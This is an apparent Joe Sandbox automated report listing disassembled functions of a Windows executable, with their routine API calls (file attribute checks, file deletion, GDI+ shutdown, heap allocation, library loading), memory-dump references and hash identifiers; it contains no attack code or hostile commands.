                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: a2d85c985ba81a08c62440a231e6bbcf5bd3a0df4600188b1d5a237c54a3a62d
                                                              • Instruction ID: 165f11daceb6585a56fc762c61371c5aa2b8207fb80586ae972b814d3e288563
                                                              • Opcode Fuzzy Hash: a2d85c985ba81a08c62440a231e6bbcf5bd3a0df4600188b1d5a237c54a3a62d
                                                              • Instruction Fuzzy Hash: 6CF065351002097FEF01AF61CC41FDA37ACAF087D5F089055B94DE5060DB71DAA8DB50
                                                              Function 00E8262F Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • DeleteFileW.KERNEL32(000000FF,?,?,00E81CCF,?,?,00E81B21,?,?,?,?,?,00EA700F,000000FF), ref: 00E82640
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00E81CCF,?,?,00E81B21,?,?,?,?,?,00EA700F), ref: 00E8266E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DeleteFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2643169976-0
                                                              • Opcode ID: 21b94773a2c0c9b0785d700d67e38329e992cf998568eba34ecb2b12eacd9498
                                                              • Instruction ID: 21a95b3dab5f8bcc868acdc1f907ae1a50440f51549a1385402451d1ba9111b9
                                                              • Opcode Fuzzy Hash: 21b94773a2c0c9b0785d700d67e38329e992cf998568eba34ecb2b12eacd9498
                                                              • Instruction Fuzzy Hash: D2E09231140209AFEF01AF71DC41BD9379CAB08785F449025B949F2050EB60ED98DA54
                                                              Function 00E8FE9C Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00EA700F,000000FF), ref: 00E8FED0
                                                              • CoUninitialize.COMBASE(?,?,?,?,00EA700F,000000FF), ref: 00E8FED5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: GdiplusShutdownUninitialize
                                                              • String ID:
                                                              • API String ID: 3856339756-0
                                                              • Opcode ID: 0fc7c553704901d80e67c0d65eb79f104bb44bd009bbc76f9ddfd6a019b73289
                                                              • Instruction ID: 5fded6f8fc549abd35895379de336414d481018fe12f6729d5c4536833bec205
                                                              • Opcode Fuzzy Hash: 0fc7c553704901d80e67c0d65eb79f104bb44bd009bbc76f9ddfd6a019b73289
                                                              • Instruction Fuzzy Hash: 47E06572504650DFC711DB59EC45B55FBF9FB8DB20F004629F416A3761CB747801CA90
                                                              Function 00E92E9E Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _swprintf.LIBCMT ref: 00E92EC8
                                                                • Part of subcall function 00E839A9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00E839BC
                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00E92EDF
                                                                • Part of subcall function 00E905A8: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00E905B9
                                                                • Part of subcall function 00E905A8: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00E905CA
                                                                • Part of subcall function 00E905A8: IsDialogMessageW.USER32(00020482,?), ref: 00E905DE
                                                                • Part of subcall function 00E905A8: TranslateMessage.USER32(?), ref: 00E905EC
                                                                • Part of subcall function 00E905A8: DispatchMessageW.USER32(?), ref: 00E905F6
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                              • String ID:
                                                              • API String ID: 2718869927-0
                                                              • Opcode ID: 65b82c07add9b56841b3a953a4da5e50b72a8c14c78e8ae97cf89a388bd7871a
                                                              • Instruction ID: a36065d80752ef94aaaaad18f861d76353275eeb5df5ed0e97f9d3cc23ad0d7d
                                                              • Opcode Fuzzy Hash: 65b82c07add9b56841b3a953a4da5e50b72a8c14c78e8ae97cf89a388bd7871a
                                                              • Instruction Fuzzy Hash: 87E0D8B740024C7EEF01B776CC0AFEA3AECAB08785F440461B249B61B3D6B5DB158B61
                                                              Function 00E82692 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetFileAttributesW.KERNEL32(?), ref: 00E826A3
                                                                • Part of subcall function 00E83553: _wcslen.LIBCMT ref: 00E83577
                                                              • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 00E826CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AttributesFile$_wcslen
                                                              • String ID:
                                                              • API String ID: 2673547680-0
                                                              • Opcode ID: 7d25c7b31938ce69478037bf24e792199fe13f6d57b55124abb6e4ab321e1338
                                                              • Instruction ID: 8971ef746226cf969c29e9e4233583c8b6d41d1e794aaeb3ac4a8bcd28939047
                                                              • Opcode Fuzzy Hash: 7d25c7b31938ce69478037bf24e792199fe13f6d57b55124abb6e4ab321e1338
                                                              • Instruction Fuzzy Hash: C4E092315001286BDF12BB68CC04BD977A8EB093E5F044161BE8DF3190DA71AE849BA0
                                                              Function 00E86B47 Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00E86B62
                                                              • LoadLibraryW.KERNEL32(?,?,00E8583E,Crypt32.dll,00000000,00E858C2,?,?,00E858A4,?,?,?,?), ref: 00E86B84
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: DirectoryLibraryLoadSystem
                                                              • String ID:
                                                              • API String ID: 1175261203-0
                                                              • Opcode ID: e12b28d383177521d3eb0f7ed495f6398dac605dd4093993b48e11418f1b9967
                                                              • Instruction ID: a712a5e3117b665968f00396fcaf272ea5b9bade64508648f2ca93071b37b980
                                                              • Opcode Fuzzy Hash: e12b28d383177521d3eb0f7ed495f6398dac605dd4093993b48e11418f1b9967
                                                              • Instruction Fuzzy Hash: 55E012B24001186ADF11A7A59C48FDB77ACAB0D3D6F0400617949F2004DAB4EA888BB0
                                                              Function 00E8F5D9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00E8F5FA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00E8F601
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: 3be020d9a1edcda8e49d30ce85986cf67bfa1c97fe69561acd568a7c71456418
                                                              • Instruction ID: 47c5d34d832928b2badc1359ca6d83ae65795ac8c3aa07b133d82488b1e2e53d
                                                              • Opcode Fuzzy Hash: 3be020d9a1edcda8e49d30ce85986cf67bfa1c97fe69561acd568a7c71456418
                                                              • Instruction Fuzzy Hash: 83E0ED71900218EBCB50EF54C941699B7E8EB48364F20916AE89AB3251E6B0AF04DB91
                                                              Function 00E9750C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00E9752A
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00E97535
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: 99da603689f40cd49a0a7848d65e8e849e7035d63eaabaa714da9ad4f4e94972
                                                              • Instruction ID: 5f6a67ef15019536a21fb9d195e373d43b5e0ca68f8fe08f1234bfc234370342
                                                              • Opcode Fuzzy Hash: 99da603689f40cd49a0a7848d65e8e849e7035d63eaabaa714da9ad4f4e94972
                                                              • Instruction Fuzzy Hash: 59D0A92482C3019CCF802AB13E0249B23C019027787A23396E8B0FA1E2EE20880C686A
                                                              Function 00E811C1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: a570a255c9b1ee4b0a772d7fba6a190a8197edadd0e5895f06372e4c704dc753
                                                              • Instruction ID: 609bfc66641c64f53cc3404a67fd0e82f2f5b16cc0071da06711043ecf46f214
                                                              • Opcode Fuzzy Hash: a570a255c9b1ee4b0a772d7fba6a190a8197edadd0e5895f06372e4c704dc753
                                                              • Instruction Fuzzy Hash: 4FC01272059286BECB015BB2DC0DC2ABBE8ABA8212F12C908F0A5D10A1C238C414DB11
                                                              Function 00E811A3 Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetDlgItem.USER32(?,?), ref: 00E811B1
                                                              • KiUserCallbackDispatcher.NTDLL(00000000), ref: 00E811B8
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CallbackDispatcherItemUser
                                                              • String ID:
                                                              • API String ID: 4250310104-0
                                                              • Opcode ID: 6735f4742d194c8a21f34017e83389397539b5d6b4a1bd3cd9e0a0bbf28af6a2
                                                              • Instruction ID: aa7cbd1d1c9ca4216386809364086f9c900abec0ad991739ec0ae295e9673e9d
                                                              • Opcode Fuzzy Hash: 6735f4742d194c8a21f34017e83389397539b5d6b4a1bd3cd9e0a0bbf28af6a2
                                                              • Instruction Fuzzy Hash: FCC04C76409285BFCB019BA19D4CC2FBFF9AB94311F12C809B1A595061C6358414DB11
                                                              Function 00E8A4A5 Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: __allrem
                                                              • String ID:
                                                              • API String ID: 2933888876-0
                                                              • Opcode ID: 494f8aabe7dc8206cc470379c2152c5dbceb2f7621ec16e0c35f418d3132d4e5
                                                              • Instruction ID: 08c3f003b2ec3f7a121803e21a8eda9f3b9c18f894aeaceab20084157328d0d8
                                                              • Opcode Fuzzy Hash: 494f8aabe7dc8206cc470379c2152c5dbceb2f7621ec16e0c35f418d3132d4e5
                                                              • Instruction Fuzzy Hash: 87319471609610CFDB15DF2AFC54E2977A5B78C724B19413AE909F7360D733AC0A8B91
                                                              Function 00E9F618 Relevance: 1.6, APIs: 1, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E9F678
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: b138158480d790220c60f1c06feb04ccf507c5d805afc2affba74b7ecbfc2d48
                                                              • Instruction ID: 1d96a89db1e7b0b4370df0a8f63ee05cd800183b63a3afe39c01d99d16fc885c
                                                              • Opcode Fuzzy Hash: b138158480d790220c60f1c06feb04ccf507c5d805afc2affba74b7ecbfc2d48
                                                              • Instruction Fuzzy Hash: 7C11E333A11724AF9F22DE29EC8189A7395AB843647160230FC15FB369DB30EC4586D1
                                                              Function 00EA0DF9 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00E9FAB6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E9E133,00000001,00000364,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9FAF7
                                                              • _free.LIBCMT ref: 00EA0E65
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 35e40875278c51e33762d8e5a3ae066d161879bcf4843a14a00897b1f4e9131f
                                                              • Instruction ID: 524e1cd1974cbf660ee3f139cbd8cdfa1c6f8c02041196d343e8cf1242f18395
                                                              • Opcode Fuzzy Hash: 35e40875278c51e33762d8e5a3ae066d161879bcf4843a14a00897b1f4e9131f
                                                              • Instruction Fuzzy Hash: 9201D6722003496BEB258E65D88595AFBD9EB8A370F25092DE594A7280EA30AC05C764
                                                              Function 00E92A92 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00E92A97
                                                                • Part of subcall function 00E869E4: _wcslen.LIBCMT ref: 00E869FA
                                                                • Part of subcall function 00E8DC56: __EH_prolog.LIBCMT ref: 00E8DC5B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: H_prolog$_wcslen
                                                              • String ID:
                                                              • API String ID: 2838827086-0
                                                              • Opcode ID: d4795e14cc4fd4967d1453c1e962a02de4d5d060ae4bd67c0cda1a2711ea5eb2
                                                              • Instruction ID: 2fa33e66f54ed64af7774fb23e5bac2069c4d756a79d2ced263948f294450efe
                                                              • Opcode Fuzzy Hash: d4795e14cc4fd4967d1453c1e962a02de4d5d060ae4bd67c0cda1a2711ea5eb2
                                                              • Instruction Fuzzy Hash: B201D87250A380AED701AB69FC037597FE1E755314F10601BE448763A3E7F51549C721
                                                              Function 00E9FAB6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00E9E133,00000001,00000364,?,00E98F0C,?,?,?,00E98987,00000050), ref: 00E9FAF7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: fe679f52e6ed1bc355ecbd805a24c138d7314f56fcfd49cce356047c6c5b0c67
                                                              • Instruction ID: 0636605c40f298244ca53c897e4d5b4613dc505d3201d4ac42be966f74860db7
                                                              • Opcode Fuzzy Hash: fe679f52e6ed1bc355ecbd805a24c138d7314f56fcfd49cce356047c6c5b0c67
                                                              • Instruction Fuzzy Hash: A3F0E931604224AADF315E22EC15B9B3788EF417B4B1DA031FC08F6194DAB0DC0082E0
                                                              Function 00E98592 Relevance: 1.5, APIs: 1, Instructions: 34libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00E985C4
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
                                                              • Associated: 00000004.00000002.2105997104.0000000000E80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106038444.0000000000EA8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EB9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106054072.0000000000EE8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                              • Associated: 00000004.00000002.2106134748.0000000000EE9000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_e80000_a.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: c838cb1de2b76389113de94f5d48d63e25a4243fddf6a2eea6c5e8483e5a9096
                                                              • Instruction ID: 231efa7b41779dc6cd7f75f0243659101d37342ce17afc9d2b803c03ee141e6c
                                                              • Opcode Fuzzy Hash: c838cb1de2b76389113de94f5d48d63e25a4243fddf6a2eea6c5e8483e5a9096
                                                              • Instruction Fuzzy Hash: 30F0A03220435A9FCF118FA9EE2089B77A9BF467657111525FE14F61A0DF30D928CB90
                                                              Function 00E9DA90 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00E98B1E,?,0000015D,?,?,?,?,00E99FFA,000000FF,00000000,?,?), ref: 00E9DAC2
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2106014316.0000000000E81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00E80000, based on PE: true
